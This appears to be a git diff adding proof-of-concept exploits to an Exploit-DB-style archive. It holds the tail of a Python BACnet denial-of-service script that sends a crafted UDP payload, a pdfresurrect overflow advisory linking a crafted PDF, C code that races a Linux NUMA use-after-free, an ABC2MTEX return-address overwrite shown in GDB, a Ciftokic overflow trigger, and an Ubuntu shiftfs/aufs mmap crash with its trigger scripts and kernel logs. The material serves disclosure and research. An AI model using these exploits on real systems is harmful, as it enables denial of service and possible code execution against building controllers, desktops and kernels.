+            payload_AtomicWriteFile = "\x81\x0a\x00\x1b\x01\x04\x00\x05\x02\x07\xc4\x02\x80\x00\x00\x0e\x35\xff\x5e\xd5\xc0\x85\x0a\x62\x64\x0a\x0f"
+
+            print((colored("[+] Sending BACnet AtomicWriteFile payload from " + SRC_IP, "green")))
+
+            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
+            s.connect((BACnetServer, BACnetPort))
+            s.send(struct.pack('>I',len(payload_AtomicWriteFile)))
+            s.send(payload_AtomicWriteFile)
+
+            print((colored("[+] Sent Payload: " + payload_AtomicWriteFile.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))
+
+        if not target_alive(BACnetServer, BACnetPort):
+            print((colored("[+] DoS completed", "red")))
+
+
+#------------------------------------------------------------------------------
+# Main
+#------------------------------------------------------------------------------
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/linux/dos/47178.txt b/exploits/linux/dos/47178.txt
new file mode 100644
index 000000000..ee6eb4a30
--- /dev/null
+++ b/exploits/linux/dos/47178.txt
@@ -0,0 +1,84 @@
+# Exploit Title: pdfresurrect 0.15 Buffer Overflow
+# Date: 2019-07-26
+# Exploit Author: j0lama
+# Vendor Homepage: https://github.com/enferex/pdfresurrect
+# Software Link: https://github.com/enferex/pdfresurrect
+# Version: 0.15
+# Tested on: Ubuntu 18.04
+# CVE : CVE-2019-14267
+
+Description
+===========
+
+PDFResurrect 0.15 has a buffer overflow via a crafted PDF file because
+data associated with startxref and %%EOF is mishandled.
+
+
+Additional Information
+======================
+
+There is a buffer overflow in pdfresurrect 0.14 caused by a malicious
+ crafted pdf file.
+
+In function pdf_load_xrefs at pdf.c file, it counts how many times the
+strings '%%EOF' appear in the pdf file. Then for each xref the code
+starts to rewind incrementing the pos_count variable until found a 'f'
+character (the last character of the 'startxref' string). Then these
+bytes between the 'f' and '%%EOF' will be read with the 'fread'
+function and copied to a 256 char buffer. The 'pos_count' variable
+tells 'freads' how many bytes has to copy. If malicious user crafted a
+pdf file with more that 256 bytes between '%%EOF' and the immediately
+previous 'f' then a buffer overflow will occur overwriting everything
+after the 'buf' buffer.
+
+In the code:
+int pdf_load_xrefs(FILE *fp, pdf_t *pdf)
+{
+    int  i, ver, is_linear;
+    long pos, pos_count;
+    char x, *c, buf[256];
+
+    c = NULL;
+
+    /* Count number of xrefs */
+    pdf->n_xrefs = 0;
+    fseek(fp, 0, SEEK_SET);
+    while (get_next_eof(fp) >= 0)
+      ++pdf->n_xrefs;
+
+    if (!pdf->n_xrefs)
+      return 0;
+
+    /* Load in the start/end positions */
+    fseek(fp, 0, SEEK_SET);
+    pdf->xrefs = calloc(1, sizeof(xref_t) * pdf->n_xrefs);
+    ver = 1;
+    for (i=0; i<pdf->n_xrefs; i++)
+    {
+        /* Seek to %%EOF */
+        if ((pos = get_next_eof(fp)) < 0)
+          break;
+
+        /* Set and increment the version */
+        pdf->xrefs[i].version = ver++;
+
+        /* Rewind until we find end of "startxref" */
+        pos_count = 0;
+        while (SAFE_F(fp, ((x = fgetc(fp)) != 'f'))) <== The loop will continue incrementing pos_count until find a 'f' char
+          fseek(fp, pos - (++pos_count), SEEK_SET);
+
+        /* Suck in end of "startxref" to start of %%EOF */
+        memset(buf, 0, sizeof(buf));
+        SAFE_E(fread(buf, 1, pos_count, fp), pos_count, <== If pos_count > 256 then a buffer overflow occur
+               "Failed to read startxref.\n");
+        c = buf;
+        while (*c == ' ' || *c == '\n' || *c == '\r')
+          ++c;
+
+        /* xref start position */
+        pdf->xrefs[i].start = atol(c);
+
+This is a crafted PDF that produces a buffer overflow: 
+
+http://www.mediafire.com/file/3540cyrl7o8p1rq/example_error.pdf/file
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47178.zip
\ No newline at end of file
diff --git a/exploits/linux/dos/47236.c b/exploits/linux/dos/47236.c
new file mode 100644
index 000000000..961176724
--- /dev/null
+++ b/exploits/linux/dos/47236.c
@@ -0,0 +1,265 @@
+/*
+On NUMA systems, the Linux fair scheduler tracks information related to NUMA
+faults in task_struct::numa_faults and task_struct::numa_group. Both of these
+have broken object lifetimes.
+
+Since commit 82727018b0d3 ("sched/numa: Call task_numa_free() from do_execve()",
+first in v3.13), ->numa_faults is freed not only when the last reference to the
+task_struct is gone, but also after successful execve(). However,
+show_numa_stats() (reachable through /proc/$pid/sched) locklessly reads data
+from ->numa_faults (use-after-free read) and prints it to a userspace buffer.
+
+To test this, I used a QEMU VM with the following NUMA configuration:
+
+    -m 8192 -smp cores=4 -numa node,nodeid=0 -numa node,nodeid=1
+
+Test code is attached; it takes a while before it triggers the bug since the
+race window is pretty small.
+
+KASAN report:
+============================
+[  909.461282] ==================================================================
+[  909.464502] BUG: KASAN: use-after-free in show_numa_stats+0x99/0x160
+[  909.465250] Read of size 8 at addr ffff8880ac8f8f00 by task numa_uaf/18471
+
+[  909.466167] CPU: 0 PID: 18471 Comm: numa_uaf Not tainted 5.2.0-rc7 #443
+[  909.466877] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
+[  909.467751] Call Trace:
+[  909.468072]  dump_stack+0x7c/0xbb
+[  909.468413]  ? show_numa_stats+0x99/0x160
+[  909.468879]  print_address_description+0x6e/0x2a0
+[  909.469419]  ? show_numa_stats+0x99/0x160
+[  909.469828]  ? show_numa_stats+0x99/0x160
+[  909.470292]  __kasan_report+0x149/0x18d
+[  909.470683]  ? show_numa_stats+0x99/0x160
+[  909.471137]  kasan_report+0xe/0x20
+[  909.471533]  show_numa_stats+0x99/0x160
+[  909.471988]  proc_sched_show_task+0x6ae/0x1e60
+[  909.472467]  sched_show+0x6a/0xa0
+[  909.472836]  seq_read+0x197/0x690
+[  909.473264]  vfs_read+0xb2/0x1b0
+[  909.473616]  ksys_pread64+0x74/0x90
+[  909.474034]  do_syscall_64+0x5d/0x260
+[  909.474975]  entry_SYSCALL_64_after_hwframe+0x49/0xbe
+[  909.475512] RIP: 0033:0x7f6f57742987
+[  909.475878] Code: 35 39 a4 09 00 48 8d 3d d1 a4 09 00 e8 52 77 f4 ff 66 90 48 8d 05 79 7d 0d 00 49 89 ca 8b 00 85 c0 75 10 b8 11 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 59 c3 41 55 49 89 cd 41 54 49 89 d4 55 48 89
+[  909.477905] RSP: 002b:00005565fc10d108 EFLAGS: 00000246 ORIG_RAX: 0000000000000011
+[  909.478684] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f6f57742987
+[  909.479393] RDX: 0000000000001000 RSI: 00005565fc10d120 RDI: 0000000000000005
+[  909.480254] RBP: 00005565fc10e130 R08: 00007f6f57657740 R09: 00007f6f57657740
+[  909.481037] R10: 0000000000000000 R11: 0000000000000246 R12: 00005565fbf0b1f0
+[  909.481821] R13: 00007ffe60338770 R14: 0000000000000000 R15: 0000000000000000
+
+[  909.482744] Allocated by task 18469:
+[  909.483135]  save_stack+0x19/0x80
+[  909.483475]  __kasan_kmalloc.constprop.3+0xa0/0xd0
+[  909.483957]  task_numa_fault+0xff2/0x1d30
+[  909.484414]  __handle_mm_fault+0x94f/0x1320
+[  909.484887]  handle_mm_fault+0x7e/0x100
+[  909.485323]  __do_page_fault+0x2bb/0x610
+[  909.485722]  async_page_fault+0x1e/0x30
+
+[  909.486355] Freed by task 18469:
+[  909.486687]  save_stack+0x19/0x80
+[  909.487027]  __kasan_slab_free+0x12e/0x180
+[  909.487497]  kfree+0xd8/0x290
+[  909.487805]  __do_execve_file.isra.41+0xf1e/0x1140
+[  909.488316]  __x64_sys_execve+0x4f/0x60
+[  909.488706]  do_syscall_64+0x5d/0x260
+[  909.489144]  entry_SYSCALL_64_after_hwframe+0x49/0xbe
+
+[  909.490121] The buggy address belongs to the object at ffff8880ac8f8f00
+                which belongs to the cache kmalloc-128 of size 128
+[  909.491564] The buggy address is located 0 bytes inside of
+                128-byte region [ffff8880ac8f8f00, ffff8880ac8f8f80)
+[  909.492919] The buggy address belongs to the page:
+[  909.493445] page:ffffea0002b23e00 refcount:1 mapcount:0 mapping:ffff8880b7003500 index:0xffff8880ac8f8d80
+[  909.494419] flags: 0x1fffc0000000200(slab)
+[  909.494836] raw: 01fffc0000000200 ffffea0002cec780 0000000900000009 ffff8880b7003500
+[  909.495633] raw: ffff8880ac8f8d80 0000000080150011 00000001ffffffff 0000000000000000
+[  909.496451] page dumped because: kasan: bad access detected
+
+[  909.497291] Memory state around the buggy address:
+[  909.497775]  ffff8880ac8f8e00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
+[  909.498546]  ffff8880ac8f8e80: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
+[  909.499319] >ffff8880ac8f8f00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
+[  909.500034]                    ^
+[  909.500429]  ffff8880ac8f8f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[  909.501150]  ffff8880ac8f9000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
+[  909.501942] ==================================================================
+[  909.502712] Disabling lock debugging due to kernel taint
+============================
+
+
+->numa_group is a refcounted reference with RCU semantics, but the RCU helpers
+are used inconsistently. In particular, show_numa_stats() reads from
+p->numa_group->faults with no protection against concurrent updates.
+
+There are also various other places across the scheduler that use ->numa_group
+without proper protection; e.g. as far as I can tell,
+sched_tick_remote()->task_tick_fair()->task_tick_numa()->task_scan_start()
+reads from p->numa_group protected only by the implicit read-side critical
+section that spinlocks currently imply by disabling preemption, and with no
+protection against the pointer unexpectedly becoming NULL.
+
+
+I am going to send suggested fixes in a minute, but I think the approach for
+->numa_group might be a bit controversial. The approach I'm taking is:
+
+ - For ->numa_faults, just wipe the statistics instead of freeing them.
+ - For ->numa_group, use proper RCU accessors everywhere.
+
+Annoyingly, if one of the RCU accessors detects a problem (with
+CONFIG_PROVE_LOCKING=y), it uses printk, and if the wrong runqueue lock is held
+at that point, a deadlock might happen, which isn't great. To avoid that, the
+second patch adds an ugly hack in printk that detects potential runqueue
+deadlocks if lockdep is on. I'm not sure how you all are going to feel about
+that one - maybe it's better to just leave it out, or do something different
+there? I don't know...
+
+I'm sending the suggested patches off-list for now; if you want me to resend
+them publicly, just say so.
+*/
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <stdio.h>
+#include <numaif.h>
+#include <sched.h>
+#include <err.h>
+#include <time.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <sys/prctl.h>
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/uio.h>
+#include <sys/syscall.h>
+#include <linux/userfaultfd.h>
+
+int sched_fd;
+
+int get_scan_seq(void) {
+  char buf[0x1000];
+  ssize_t buflen = pread(sched_fd, buf, sizeof(buf)-1, 0);
+  if (buflen == -1) err(1, "read sched");
+  buf[buflen] = '\0';
+  char *p = strstr(buf, "numa_scan_seq");
+  if (!p) errx(1, "no numa_scan_seq");
+  *strchrnul(p, '\n') = '\0';
+  p = strpbrk(p, "0123456789");
+  if (!p) errx(1, "no numa_scan_seq");
+  return atoi(p);
+}
+
+void reexec(char *arg0) {
+  char *argv[] = {arg0, NULL};
+  execvp("/proc/self/exe", argv);
+  err(1, "reexec");
+}
+
+volatile int uaf_child_ready = 0;
+static int sfd_uaf(void *fd_) {
+  int fd = (int)(long)fd_;
+/*
+  prctl(PR_SET_PDEATHSIG, SIGKILL);
+  if (getppid() == 1) raise(SIGKILL);
+*/
+
+  while (1) {
+    char buf[0x1000];
+    ssize_t res = pread(fd, buf, sizeof(buf)-1, 0);
+    if (res == -1) {
+      if (errno == ESRCH) _exit(0);
+      err(1, "pread");
+    }
+    buf[res] = '\0';
+    puts(buf);
+    uaf_child_ready = 1;
+  }
+}
+
+int main(int argc, char **argv) {
+  if (strcmp(argv[0], "die") == 0) {
+    _exit(0);
+  }
+  sched_fd = open("/proc/self/sched", O_RDONLY|O_CLOEXEC);
+  if (sched_fd == -1) err(1, "open sched");
+
+  // allocate two pages at the lowest possible virtual address so that the first periodic memory fault is scheduled on the first page
+  char *page = mmap((void*)0x1000, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
+  if (page == MAP_FAILED) err(1, "mmap");
+  *page = 'a';
+
+  // handle the second page with uffd
+  int ufd = syscall(__NR_userfaultfd, 0);
+  if (ufd == -1) err(1, "userfaultfd");
+  struct uffdio_api api = { .api = UFFD_API, .features = 0 };
+  if (ioctl(ufd, UFFDIO_API, &api)) err(1, "uffdio_api");
+  struct uffdio_register reg = {
+    .mode = UFFDIO_REGISTER_MODE_MISSING,
+    .range = { .start = (__u64)page+0x1000, .len = 0x1000 }
+  };
+  if (ioctl(ufd, UFFDIO_REGISTER, &reg))
+    err(1, "uffdio_register");
+
+  // make sure that the page is on the CPU-less NUMA node
+  unsigned long old_nodes = 0x1;
+  unsigned long new_nodes = 0x2;
+  if (migrate_pages(0, sizeof(unsigned long), &old_nodes, &new_nodes)) err(1, "migrate_pages");
+
+  // trigger userfault in child
+  pid_t uffd_child = fork();
+  if (uffd_child == -1) err(1, "fork");
+  if (uffd_child == 0) {
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+    struct iovec iov = { .iov_base = (void*)0x1fff, .iov_len = 2 };
+    process_vm_readv(getppid(), &iov, 1, &iov, 1, 0);
+    err(1, "process_vm_readv returned");
+  }
+  sleep(1);
+
+  int ini_seq = get_scan_seq();
+  printf("initial scan_seq: %d\n", ini_seq);
+  if (ini_seq) reexec("m");
+
+  // wait for a migration
+  time_t start_time = time(NULL);
+  while (1) {
+    if (time(NULL) > start_time + 30) {
+      puts("no migration detected!");
+      reexec("m");
+    }
+    int cur_seq = get_scan_seq();
+    if (cur_seq != 0) {
+      printf("new scan_seq: %d\n", cur_seq);
+      goto migration_done;
+    }
+  }
+
+migration_done:
+  printf("migration done after %d seconds\n", (int)(time(NULL)-start_time));
+  while (1) {
+    pid_t pid = fork();
+    if (pid == -1) err(1, "fork");
+    if (pid == 0) {
+      static char uaf_stack[1024*1024];
+      static char uaf_stack2[1024*1024];
+      int sfd = open("/proc/self/sched", O_RDONLY);
+      if (sfd == -1) err(1, "open sched");
+      pid_t uaf_child = clone(sfd_uaf, uaf_stack+sizeof(uaf_stack), CLONE_FILES|CLONE_VM, (void*)(long)sfd);
+      if (uaf_child == -1) err(1, "clone uaf_child");
+      uaf_child = clone(sfd_uaf, uaf_stack2+sizeof(uaf_stack2), CLONE_FILES|CLONE_VM, (void*)(long)sfd);
+      if (uaf_child == -1) err(1, "clone uaf_child");
+      while (!uaf_child_ready) __builtin_ia32_pause();
+      *(volatile char *)page = 'b';
+      reexec("die");
+    }
+    int status;
+    if (wait(&status) != pid) err(1, "wait");
+  }
+}
\ No newline at end of file
diff --git a/exploits/linux/dos/47254.txt b/exploits/linux/dos/47254.txt
new file mode 100644
index 000000000..299dd2206
--- /dev/null
+++ b/exploits/linux/dos/47254.txt
@@ -0,0 +1,64 @@
+Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow
+Date: 2019-08-13
+Exploit Author: Carter Yagemann <yagemann@gatech.edu>
+Vendor Homepage: https://abcnotation.com/abc2mtex/
+Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
+Version: 1.6.1
+Tested on: Debian Buster
+
+An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return
+address from the openIn function by providing a long input filename. This
+carries similar risk to CVE-2004-1257.
+
+Setup:
+
+$ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
+$ tar -xzf abc2mtex1.6.1.tar.gz
+$ make
+
+$ gcc --version
+gcc (Debian 8.3.0-6) 8.3.0
+Copyright (C) 2018 Free Software Foundation, Inc.
+This is free software; see the source for copying conditions.  There is NO
+warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+
+PoC:
+
+$ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
+
+GDB:
+
+We're going to place a breakpoint before and after abc.c:241 to show the overflow.
+
+$ gdb -q ./abc2mtex
+Reading symbols from ./abc2mtex...done.
+(gdb) break abc.c:241
+Breakpoint 1 at 0x4139: file abc.c, line 241.
+(gdb) break abc.c:242
+Breakpoint 2 at 0x414c: file abc.c, line 242.
+(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
+Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
+
+Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
+241                     (void) strcpy(savename,filename);
+(gdb) bt
+#0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
+#1  0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273
+(gdb) c
+Continuing.
+
+Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
+242                     (void) strcat(filename,".abc");
+(gdb) bt
+#0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
+#1  0x0000414243444546 in ?? ()
+#2  0x00007fffffffe4f8 in ?? ()
+#3  0x0000000200000000 in ?? ()
+#4  0x0000000000000000 in ?? ()
+(gdb) c
+Continuing.
+file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist
+
+Program received signal SIGSEGV, Segmentation fault.
+0x0000414243444546 in ?? ()
+(gdb) quit
\ No newline at end of file
diff --git a/exploits/linux/dos/47445.py b/exploits/linux/dos/47445.py
new file mode 100755
index 000000000..6fbca1ba0
--- /dev/null
+++ b/exploits/linux/dos/47445.py
@@ -0,0 +1,46 @@
+# Exploit Title: Ciftokic 2.4a - DoS Buffer Overflow
+# Date: September 30, 2019
+# Exploit Author: @JosueEncinar
+# Software Link: http://launchpad.net/ubuntu/+source/kic/2.4a-1
+# Version: 2.4a 
+# Tested on: Ubuntu 18.04
+
+'''
+If we check the ciftokic.c file on line 52 we see the following code: char CIFFile[81], *Tmp;.  
+In line 84 we have the problem with the following instruction: strcpy(CIFFile,argv[1]);
+
+If the first argument is 80 characters or less, nothing happens, but if we put from 81 onwards the program fails with a Buffer Overflow.
+'''
+
+# To test the code use Python 3.6+
+from os import system
+from sys import argv
+
+
+def print_usage():
+    print("Usage: python3 ciftokic_overflow.py <characters_numbers>")
+    print("      |_No Buffer Overflow: python3 ciftokic_overflow.py 80")
+    print("      |_Buffer Overflow: python3 ciftokic_overflow.py 81")
+
+if len(argv) == 1:
+    print_usage()
+else:
+    try:
+        number = int(argv[1])
+        payload = "J"*number
+        system(f"ciftokic {payload}")
+    except:
+        print_usage()
+
+
+"""
+
+Output Example:
+
+josue@josue:~/Escritorio$ python3 ciftokic_overflow.py 80
+Error: can't read CIF input file JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
+josue@josue:~/Escritorio$ python3 ciftokic_overflow.py 81
+*** buffer overflow detected ***: ciftokic terminated
+Aborted (core dumped)
+
+"""
\ No newline at end of file
diff --git a/exploits/linux/dos/47692.txt b/exploits/linux/dos/47692.txt
new file mode 100644
index 000000000..81036686c
--- /dev/null
+++ b/exploits/linux/dos/47692.txt
@@ -0,0 +1,188 @@
+Tested on 19.10.
+
+Ubuntu's aufs kernel patch includes the following change (which I interestingly
+can't see in the AUFS code at
+https://github.com/sfjro/aufs5-linux/blob/master/mm/mmap.c):
+
+==================================================================
++#define vma_fput(vma)                  vma_do_fput(vma, __func__, __LINE__)
+[...]
+@@ -1847,8 +1847,8 @@ unsigned long mmap_region(struct file *file, unsigned long addr,
+        return addr;
+ 
+ unmap_and_free_vma:
++       vma_fput(vma);
+        vma->vm_file = NULL;
+-       fput(file);
+ 
+        /* Undo any partial mapping done by a device driver. */
+        unmap_region(mm, vma, prev, vma->vm_start, vma->vm_end);
+[...]
++void vma_do_fput(struct vm_area_struct *vma, const char func[], int line)
++{
++       struct file *f = vma->vm_file, *pr = vma->vm_prfile;
++
++       prfile_trace(f, pr, func, line, __func__);
++       fput(f);
++       if (f && pr)
++               fput(pr);
++}
+==================================================================
+
+This means that in the case where call_mmap() returns an error to mmap_region(),
+fput() will be called on the current value of vma->vm_file instead of the saved
+file pointer. This matters if the ->mmap() handler replaces ->vm_file before
+returning an error code.
+
+overlayfs and shiftfs do that when call_mmap() on the lower filesystem fails,
+see ovl_mmap() and shiftfs_mmap().
+
+To demonstrate the issue, the PoC below mounts a shiftfs that is backed by a
+FUSE filesystem with the FUSE flag FOPEN_DIRECT_IO, which causes fuse_file_mmap()
+to bail out with -ENODEV if MAP_SHARED is set.
+
+I would have used overlayfs instead, but there is an unrelated bug that makes it
+impossible to mount overlayfs inside a user namespace:
+Commit 82c0860106f264 ("UBUNTU: SAUCE: overlayfs: Propogate nosuid from lower
+and upper mounts") defines SB_I_NOSUID as 0x00000010, but SB_I_USERNS_VISIBLE
+already has the same value. This causes mount_too_revealing() to bail out with a
+WARN_ONCE().
+
+Note that this PoC requires the "bindfs" package and should be executed with
+"slub_debug" in the kernel commandline to get a clear crash.
+
+==================================================================
+Ubuntu 19.10 user-Standard-PC-Q35-ICH9-2009 ttyS0
+
+user-Standard-PC-Q35-ICH9-2009 login: user
+Password: 
+Last login: Fr Nov  1 23:45:36 CET 2019 on ttyS0
+Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-19-generic x86_64)
+
+ * Documentation:  https://help.ubuntu.com
+ * Management:     https://landscape.canonical.com
+ * Support:        https://ubuntu.com/advantage
+
+
+0 updates can be installed immediately.
+0 of these updates are security updates.
+
+user@user-Standard-PC-Q35-ICH9-2009:~$ ls
+aufs-mmap  Documents  Music     Public     trace.dat
+Desktop    Downloads  Pictures  Templates  Videos
+user@user-Standard-PC-Q35-ICH9-2009:~$ cd aufs-mmap/
+user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat /proc/cmdline 
+BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=f7d8d4fb-0c96-498e-b875-0b777127a332 ro console=ttyS0 slub_debug quiet splash vt.handoff=7
+user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run.sh
+#!/bin/sh
+sync
+unshare -mUr ./run2.sh
+user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run2.sh
+#!/bin/bash
+set -e
+
+mount -t tmpfs none /tmp
+mkdir -p /tmp/{lower,middle,upper}
+touch /tmp/lower/foo
+# mount some random FUSE filesystem with direct_io,
+# doesn't really matter what it does as long as
+# there's a file in it.
+# (this is just to get some filesystem that can
+# easily be convinced to throw errors from f_op->mmap)
+bindfs -o direct_io /tmp/lower /tmp/middle
+# use the FUSE filesystem to back shiftfs.
+# overlayfs would also work if SB_I_NOSUID and
+# SB_I_USERNS_VISIBLE weren't defined to the same
+# value...
+mount -t shiftfs -o mark /tmp/middle /tmp/upper
+mount|grep shift
+gcc -o trigger trigger.c -Wall
+./trigger
+user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat trigger.c
+#include <fcntl.h>
+#include <err.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <stdio.h>
+
+int main(void) {
+  int foofd = open("/tmp/upper/foo", O_RDONLY);
+  if (foofd == -1) err(1, "open foofd");
+  void *badmap = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
+  if (badmap == MAP_FAILED) {
+    perror("badmap");
+  } else {
+    errx(1, "badmap worked???");
+  }
+  sleep(1);
+  mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
+}
+user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ ./run.sh 
+/tmp/middle on /tmp/upper type shiftfs (rw,relatime,mark)
+badmap: No such device
+[   72.101721] general protection fault: 0000 [#1] SMP PTI
+[   72.111917] CPU: 1 PID: 1376 Comm: trigger Not tainted 5.3.0-19-generic #20-Ubuntu
+[   72.124846] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+[   72.140965] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[   72.149210] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[   72.167229] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
+[   72.170426] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 7800000000000000
+[   72.174528] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: ffff9c1cc48b5900
+[   72.177790] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 0000000000000000
+[   72.181199] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: ffff9c1cf1ae5790
+[   72.186306] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: ffff9c1cf7209740
+[   72.189705] FS:  00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) knlGS:0000000000000000
+[   72.193073] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[   72.195390] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 0000000000360ee0
+[   72.198237] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[   72.200557] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[   72.202815] Call Trace:
+[   72.203712]  mmap_region+0x417/0x670
+[   72.204868]  do_mmap+0x3a8/0x580
+[   72.205939]  vm_mmap_pgoff+0xcb/0x120
+[   72.207954]  ksys_mmap_pgoff+0x1ca/0x2a0
+[   72.210078]  __x64_sys_mmap+0x33/0x40
+[   72.211327]  do_syscall_64+0x5a/0x130
+[   72.212538]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[   72.214177] RIP: 0033:0x7faa3ecc7af6
+[   72.215352] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
+[   72.222275] RSP: 002b:00007ffd0fc44c68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
+[   72.224714] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007faa3ecc7af6
+[   72.228123] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
+[   72.230913] RBP: 0000000000000000 R08: 0000000000000003 R09: 0000000000000000
+[   72.233193] R10: 0000000000000001 R11: 0000000000000246 R12: 0000556248213100
+[   72.235448] R13: 00007ffd0fc44d70 R14: 0000000000000000 R15: 0000000000000000
+[   72.237681] Modules linked in: shiftfs intel_rapl_msr snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_common crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 crypto_simd snd_seq cryptd glue_helper joydev input_leds serio_raw snd_seq_device snd_timer snd qxl ttm soundcore qemu_fw_cfg drm_kms_helper drm fb_sys_fops syscopyarea sysfillrect sysimgblt mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover failover ahci psmouse lpc_ich i2c_i801 libahci virtio_blk
+[   72.257673] ---[ end trace 5d85e7b7b0bae5f5 ]---
+[   72.259237] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[   72.260990] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[   72.269615] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
+[   72.271414] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 7800000000000000
+[   72.273893] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: ffff9c1cc48b5900
+[   72.276354] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 0000000000000000
